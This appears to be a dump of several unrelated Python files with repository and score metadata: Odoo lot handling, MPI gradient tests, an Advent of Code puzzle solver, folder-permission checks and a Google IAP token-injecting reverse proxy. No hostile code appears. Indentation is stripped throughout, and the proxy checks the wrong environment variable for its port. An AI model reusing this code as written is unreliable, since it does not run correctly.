default = {'quantity': movelots.quantity_done, 'lot_produced_id': self.lot_id.id}
new_move_lot = movelots.copy(default=default)
movelots.write({'quantity': remaining_qty, 'quantity_done': 0})
else:
movelots.write({'lot_produced_id': self.lot_id.id})
return True
| 2.03125 | 2 |
vmad/lib/tests/test_mpi.py | Maxelee/vmad | 2 | 12761547 | from vmad.lib import linalg, mpi
from vmad.testing import BaseScalarTest
from mpi4py import MPI
import numpy
from pprint import pprint
class Test_allreduce(BaseScalarTest):
to_scalar = staticmethod(linalg.to_scalar)
comm = MPI.COMM_WORLD
x = comm.rank + 1.0
y = comm.allreduce(x) ** 2
x_ = numpy.eye(1)
# self.x is distributed, thus allreduce along the rank axis.
def inner(self, a, b):
return self.comm.allreduce(numpy.sum(a * b))
def model(self, x):
return mpi.allreduce(x, self.comm)
class Test_allbcast(BaseScalarTest):
to_scalar = staticmethod(lambda x: x)
comm = MPI.COMM_WORLD
x = 2.0
y = comm.allreduce(x * (comm.rank + 1))
x_ = numpy.eye(1)
# self.x is universal, thus no special allreduce here.
def inner(self, a, b):
return numpy.sum(a*b)
def model(self, x):
x = mpi.allbcast(x, self.comm)
x = x * (self.comm.rank + 1)
return mpi.allreduce(x, comm=self.comm)
| 2.171875 | 2 |
2020/day7.py | VessToska/Advent-of-Code | 3 | 12761548 | <gh_stars>1-10
from collections import OrderedDict
day_num = 7
file_load = open("input/day7.txt", "r")
file_in = file_load.read()
file_load.close()
file_in = file_in.replace(",","")
file_in = file_in.replace(".","")
file_in = file_in.replace("bags ", "")
file_in = file_in.replace("contain ", "")
file_in = file_in.replace("bags", "")
file_in = file_in.replace("bag ", "")
file_in = file_in.replace("bag", "")
file_in = file_in.split("\n")
file_in = [temp_bag[:-1] for temp_bag in file_in]
file_new = []
for temp_bags in file_in:
temp_hold = []
iter_bag = iter(temp_bags.split(" "))
temp_hold.append(next(iter_bag) + " " + next(iter_bag))
while True:
try:
bag_num = int(next(iter_bag))
bag_glint = next(iter_bag)
bag_color = next(iter_bag)
for temp_count in range(bag_num):
temp_hold.append(bag_glint + " " + bag_color)
except:
break
file_new.append(temp_hold)
file_in = []
for temp_bags in file_new:
file_in.append(list(OrderedDict.fromkeys(temp_bags)))
input_search = [temp_bags[0] for temp_bags in file_in]
file_in.pop(input_search.index("shiny gold"))
file_in = [temp_bags for temp_bags in file_in if len(temp_bags) != 1]
def run():
def size(input_in, bag_search):
size_weight = 1
input_search = [temp_bags[0] for temp_bags in input_in]
bag_check = input_in[input_search.index(bag_search)]
if len(bag_check) == 1:
return 1
else:
for temp_each in bag_check[1:]:
size_weight += size(input_in, temp_each)
return size_weight
def shiny(input_in):
bag_verif = []
for temp_bags in input_in:
if "shiny gold" in temp_bags:
bag_verif.append(temp_bags[0])
while True:
bag_flag = False
for temp_bags in input_in:
if temp_bags[0] not in bag_verif:
if any(temp_check in temp_bags for temp_check in bag_verif):
bag_verif = [temp_bags[0]] + bag_verif
input_in.pop(input_in.index(temp_bags))
bag_flag = True
if not bag_flag:
return len(bag_verif)
def weight(input_in):
bag_weight = 0
input_search = [temp_bags[0] for temp_bags in input_in]
for temp_bag in input_in[input_search.index("shiny gold")][1:]:
bag_weight += size(input_in, temp_bag)
return bag_weight
return shiny(file_in.copy()), weight(file_new)
if __name__ == "__main__":
print(run()) | 3.03125 | 3 |
botbot/schecks.py | jackstanek/BotBot | 2 | 12761549 | """Strict shared-folder permission checks"""
import stat
def file_groupreadable(path):
"""Check whether a given path has bad permissons."""
if not bool(stat.S_IRGRP & path.stat().mode):
return 'PROB_FILE_NOT_GRPRD'
def file_group_executable(path):
"""Check if a file should be group executable"""
mode = path.stat().mode
if stat.S_ISDIR(mode):
return
if bool(stat.S_IXUSR & mode) and not bool(stat.S_IXGRP & mode):
return 'PROB_FILE_NOT_GRPEXEC'
def dir_group_readable(path):
"""Check if a directory is accessible and readable"""
mode = path.stat().mode
if not stat.S_ISDIR(mode):
return
else:
if not bool(stat.S_IXGRP & mode):
return 'PROB_DIR_NOT_ACCESSIBLE'
elif not bool(stat.S_IWGRP & mode):
return 'PROB_DIR_NOT_WRITABLE'
ALLSCHECKS = (file_groupreadable, file_group_executable, dir_group_readable)
| 2.828125 | 3 |
sonarqube/iap_proxy.py | cognitedata/security-github-actions | 1 | 12761550 | #!/usr/bin/env python3
from sys import stderr
import os
import json
import requests
from urllib.parse import quote as urlquote
from google.oauth2.service_account import IDTokenCredentials
from google.oauth2 import id_token
from google.auth.transport.requests import Request
from twisted.internet import reactor, ssl
from twisted.web import proxy, server
from twisted.protocols.tls import TLSMemoryBIOFactory
from twisted.logger import globalLogBeginner, textFileLogObserver
globalLogBeginner.beginLoggingTo([textFileLogObserver(stderr)])
def get_oidc_token(request, client_id, service_account):
sa_info = json.loads(service_account)
credentials = IDTokenCredentials.from_service_account_info(
sa_info, target_audience=client_id
)
credentials.refresh(request)
return credentials.token
def exchange_google_id_token_for_gcip_id_token(api_key, google_open_id_connect_token):
SIGN_IN_WITH_IDP_API = 'https://identitytoolkit.googleapis.com/v1/accounts:signInWithIdp'
url = SIGN_IN_WITH_IDP_API + '?key=' + api_key
data={'requestUri': 'http://localhost',
'returnSecureToken': True,
'postBody':'id_token=' + google_open_id_connect_token + '&providerId=google.com'}
resp = requests.post(url, data)
res = resp.json()
return res['idToken']
class IAPReverseProxyResource(proxy.ReverseProxyResource):
def proxyClientFactoryClass(self, *args, **kwargs):
return TLSMemoryBIOFactory(
ssl.optionsForClientTLS(self.host),
True,
super().proxyClientFactoryClass(*args, **kwargs),
)
def __init__(self, id_token, custom_auth_header, target_uri, target_port, path=b""):
super().__init__(target_uri, target_port, path)
self.id_token = id_token
self.custom_auth_header = custom_auth_header
def render(self, request):
if self.custom_auth_header and request.requestHeaders.hasHeader(b"authorization"):
request.requestHeaders.setRawHeaders(
self.custom_auth_header,
request.requestHeaders.getRawHeaders(b"authorization", []),
)
request.requestHeaders.setRawHeaders(b"authorization", ['Bearer {}'.format(self.id_token)])
return super().render(request)
def getChild(self, path, request):
return IAPReverseProxyResource(
self.id_token,
self.custom_auth_header,
self.host,
self.port,
self.path + b"/" + urlquote(path, safe=b"").encode("utf-8"),
)
custom_auth_header = os.environ.get("IAP_CUSTOM_AUTH_HEADER")
target_host = os.environ["IAP_TARGET_HOST"]
target_port = (
int(os.environ.get("IAP_TARGET_PORT")) if os.environ.get("TARGET_PORT") else 443
)
client_id = os.environ["IAP_CLIENT_ID"]
sa_data = os.environ["IAP_SA"]
api_key = os.environ["API_KEY"]
open_id_connect_token = get_oidc_token(Request(), client_id, sa_data)
id_token = exchange_google_id_token_for_gcip_id_token(api_key, open_id_connect_token)
site = server.Site(
IAPReverseProxyResource(id_token, custom_auth_header, target_host, target_port)
)
reactor.listenTCP(9000, site, interface="127.0.0.1")
reactor.run() | 2.109375 | 2 |